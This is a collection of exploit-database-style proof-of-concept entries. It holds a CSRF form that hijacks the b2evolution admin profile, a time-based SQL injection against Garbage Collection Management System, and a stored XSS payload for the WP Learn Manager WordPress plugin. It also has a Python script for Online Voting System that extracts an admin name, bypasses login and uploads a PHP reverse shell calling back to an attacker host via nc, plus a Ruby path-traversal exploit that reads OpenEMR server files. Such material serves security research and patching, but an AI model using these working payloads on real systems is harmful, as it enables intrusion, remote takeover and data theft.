&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
#### Proof-Of-Concept ####
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_gender" value="M" />
<input type="hidden" name="edited_user_ctry_ID" value="233" />
<input type="hidden" name="edited_user_rgn_ID" value="" />
<input type="hidden" name="edited_user_subrg_ID" value="" />
<input type="hidden" name="edited_user_city_ID" value="" />
<input type="hidden" name="edited_user_age_min" value="" />
<input type="hidden" name="edited_user_age_max" value="" />
<input type="hidden" name="edited_user_birthday_month" value="" />
<input type="hidden" name="edited_user_birthday_day" value="" />
<input type="hidden" name="edited_user_birthday_year" value="" />
<input type="hidden" name="organizations[]" value="1" />
<input type="hidden" name="org_roles[]" value="King of Spades" />
<input type="hidden" name="org_priorities[]" value="" />
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
<input type="hidden" name="uf_new[2][]" value="" />
<input type="hidden" name="uf_new[3][]" value="" />
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
<input type="hidden" name="new_field_type" value="0" />
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
<input type="hidden" name="ctrl" value="user" />
<input type="hidden" name="user_tab" value="profile" />
<input type="hidden" name="identity_form" value="1" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="orig_user_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
# Exploit Author: ircashem
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
####################
# Proof of Concept #
####################
POST /login.php HTTP/1.1
Content-Length: 456
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
Origin: http://localhost
DNT: 1
Referer: http://localhost/
Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Connection: close
-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="username"
admin
-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="password"
admin' AND (SELECT 1 from (select sleep(5))a) -- -
-----------------------------238993435340593308934076060075
Content-Disposition: form-data; name="submit"
-----------------------------238993435340593308934076060075--
###########
# Payload #
###########
username=admin
password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)
# Date: July 2, 2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://wplearnmanager.com/
# Software Link: https://wordpress.org/plugins/learn-manager/
# Version: 1.1.2
# References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1
*Description:*
The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated)
*Proof of Concept:*
POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
Connection: close
Upgrade-Insecure-Requests: 1
fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save
Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere
# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)
# Exploit Author: Geiseric
# Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075
# Date 02.07.2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
# Version 1.0
# Tested on: Ubuntu 20.04
import requests
import os
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
import string
import random
if len(sys.argv) < 4:
print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>')
exit()
url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
exp_url = '/Online_voting_system/admin/save_candidate.php'
login_url = '/Online_voting_system/admin/'
def first_get():
r = requests.get(url+login_url)
return r.headers['Set-Cookie']
def retrieve_first_admin():
print("[!] Stage 1: Finding a valid admin user through SQL Injection")
cookie = first_get()
count = 0
i=1
flag = True
admin = ''
while flag:
for j in range(32,128):
r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie})
if (r.elapsed.total_seconds() > 1):
admin += chr(j)
i+=1
sys.stdout.write("\rAdmin User: "+ admin)
sys.stdout.flush()
count=0
else:
if count == 100:
flag = False
break
else:
count += 1
print("\n[+] First admin user found!")
print("[!] Starting Stage 2")
return admin
def id_generator(size=6, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))+'.php'
def login_bypass(cookie):
username = retrieve_first_admin()
print("[!] Stage 2 started: Bypassing Login...")
r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie})
return cookie
def rev_write():
name = id_generator()
f = open(name,'w')
f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>')
f.close()
print('[+] Generated file with reverse shell: ' +name)
return name
def exploit(cookie):
print("[+] Uploading reverse shell...")
filename=rev_write()
multipart_data = MultipartEncoder(
{
# a file upload field
'image': (filename, open(filename, 'rb'), 'application/x-php'),
# plain text fields
'user_name': 'admin',
'rfirstname': 'test',
'rlastname': 'test',
'rgender': 'Male',
'ryear': '1st year',
'rmname': 'test',
'rposition': 'Governor',
'party': 'test',
'save': 'save'
}
)
r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie})
return filename
filename = exploit(login_bypass(first_get()))
print("[!] Triggering...")
input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.')
os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s')
print("[+] Cleaning up!")
os.system("rm "+ filename)
# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530
# Date: 2021-06-24
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml
# Version: < 5.0.2 (it means up to 5.0.1.7)
# Tested on: OpenEMR Version 5.0.1
# References: https://www.exploit-db.com/exploits/50037
# CVE: CVE-2019-14530
# CWE: CWE-22
# Patch: https://github.com/openemr/openemr/pull/2592/files
#!/usr/bin/env ruby
require 'pathname'
require 'httpx'
require 'docopt'
doc = <<~DOCOPT
OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
#{__FILE__} exploit <url> <filename> <username> <password> [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the file to be read
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass
#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass
DOCOPT
def login(root_url, user, pass, http)
vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
params = {
'new_login_session_management' => '1',
'authProvider' => 'Default',
'authUser' => user,
'clearPass' => pass,
'languageChoice' => '1'
}
http.post(vuln_url, form: params).body.to_s
end
def exploit(root_url, filename, http)
vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}"
http.get(vuln_url).body.to_s
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
if args['exploit']
http = HTTPX.plugin(:cookies).plugin(:follow_redirects)
login(args['<url>'], args['<username>'], args['<password>'], http)
puts exploit(args['<url>'], args['<filename>'], http)
end
rescue Docopt::Exit => e
puts e.message
end